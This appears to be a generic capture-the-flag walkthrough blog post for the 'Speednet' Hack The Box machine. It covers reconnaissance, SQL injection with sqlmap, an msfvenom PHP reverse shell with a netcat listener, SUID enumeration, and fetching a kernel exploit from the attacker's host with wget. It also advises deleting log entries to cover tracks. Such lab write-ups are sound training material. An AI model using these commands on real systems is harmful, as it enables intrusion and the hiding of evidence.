Speednet Hack The Box: A Step-by-Step Guide
Hey guys! Today, we're diving into the Speednet machine on Hack The Box (HTB). This box is a fantastic way to sharpen your web exploitation and privilege escalation skills. We'll walk through each step, from initial enumeration to rooting the box. So, buckle up and let’s get started!
Initial Reconnaissance
Okay, so the first thing we always do, right? Nmap scan! This is where we start poking around to see what services are running. Let's fire up nmap to scan all ports on the target machine.
nmap -p- -T4 -v <target_ip>
This command scans all TCP ports using an aggressive timing template (-T4) and provides verbose output (-v). After the scan, we usually find open ports such as 22 (SSH) and 80 (HTTP). Let's focus on the web service running on port 80.
Navigating to the IP address in our browser reveals a simple webpage. Always remember, guys, never underestimate simple webpages. Time to dig deeper. Let's use dirb or gobuster to enumerate directories and files. These tools help us discover hidden paths and potential vulnerabilities. I prefer gobuster, so let's use that:
gobuster dir -u http://<target_ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
This command uses the directory-list-2.3-medium.txt wordlist to find directories on the web server. The -t 50 option sets the number of concurrent threads to 50, speeding up the scan. Keep an eye out for interesting directories like /admin, /uploads, or any directory that might hint at sensitive information or functionality.
Web Exploitation
After running gobuster, we might find a directory called /admin. Browsing to this directory could reveal an admin panel. The initial landing page shows a login form. Let's try some common default credentials like admin:admin or administrator:password. It’s surprising how often default credentials work, but always try it!
If default credentials don't work, it's time to get creative. Look for any hints or clues on the page. Sometimes, developers leave comments in the HTML source code that can reveal usernames or other important information. View the page source by right-clicking and selecting "View Page Source" or using the browser’s developer tools (usually F12).
Another potential attack vector is SQL injection. Try entering single quotes (') in the username or password fields to see if the application throws an error. If it does, it might be vulnerable to SQL injection. Tools like sqlmap can automate the process of exploiting SQL injection vulnerabilities. For example:
sqlmap -u http://<target_ip>/admin/login.php --data "username=admin&password=password" --dbs
This command tests the login form for SQL injection vulnerabilities and attempts to enumerate the databases. If successful, you can then dump the contents of the database to retrieve usernames, passwords, or other sensitive information. SQL injection is powerful; be sure to master it!
Gaining Initial Access
Let's assume we found a vulnerability that allows us to upload files. Many web applications have upload functionalities, and these are often misconfigured, allowing us to upload malicious files. Try uploading a simple PHP reverse shell.
First, create a PHP reverse shell. You can use msfvenom to generate one:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=4444 -f raw
Save the output to a file, such as shell.php. Then, upload this file through the admin panel. After uploading, you'll need to access the file through your browser. Usually, the path is predictable, such as /uploads/shell.php. Before accessing the file, start a listener on your attacking machine using netcat or Metasploit:
nc -lvnp 4444
Once you access shell.php in your browser, the PHP code will execute, and you should receive a reverse shell on your attacking machine. Now that we have a shell, let's stabilize it using Python:
python -c 'import pty; pty.spawn("/bin/bash")'
Privilege Escalation
Now that we have a foothold on the system, the real fun begins: privilege escalation! This involves finding a way to gain higher privileges, ultimately leading to root access. The first thing to do is enumerate the system. Look for SUID binaries, misconfigured services, or vulnerable kernel versions.
Enumeration
Start by checking SUID binaries. SUID binaries are files that run with the privileges of the owner, which can sometimes be root. Use the following command to find SUID binaries:
find / -perm -4000 2>/dev/null
Examine the output for any unusual or custom binaries. Sometimes, these binaries can be exploited to gain root access. Also, check for world-writable files and directories. These can be modified by any user, potentially leading to privilege escalation.
find / -writable -type d 2>/dev/null
find / -perm -0002 -type f 2>/dev/null
Exploiting SUID Binaries
If you find an interesting SUID binary, research it to see if there are any known exploits. Sometimes, a simple Google search can reveal a vulnerability. For example, if you find a SUID binary that calls system commands without proper input validation, you might be able to inject your own commands.
Another common technique is to check the system's kernel version. Vulnerable kernel versions can be exploited using readily available exploits. Use the uname -a command to get the kernel version, and then search for exploits on Exploit-DB or other vulnerability databases.
Kernel Exploitation
Let's say we find a vulnerable kernel. Download the exploit to the target machine. You can use wget or curl if they are available. If not, you can use Python to serve the file from your attacking machine and download it on the target.
First, on your attacking machine, start a simple HTTP server:
python -m SimpleHTTPServer 8000
Then, on the target machine, download the exploit:
wget http://<your_ip>:8000/exploit.c
Compile the exploit using gcc:
gcc exploit.c -o exploit
Finally, run the exploit. If everything goes well, you should get a root shell.
./exploit
Post-Exploitation
After gaining root access, it's important to clean up your tracks. Remove any uploaded files, log entries, or other artifacts that might indicate your presence. Also, take the time to understand the vulnerabilities you exploited and document them. This will help you improve your skills and prevent similar attacks in the future.
Grab the user.txt and root.txt flags from the appropriate directories to complete the Hack The Box challenge.
Final Thoughts
That's it, guys! We've successfully rooted the Speednet machine on Hack The Box. Remember, practice is key to improving your skills. Keep exploring new machines, experimenting with different techniques, and never stop learning. Happy hacking!
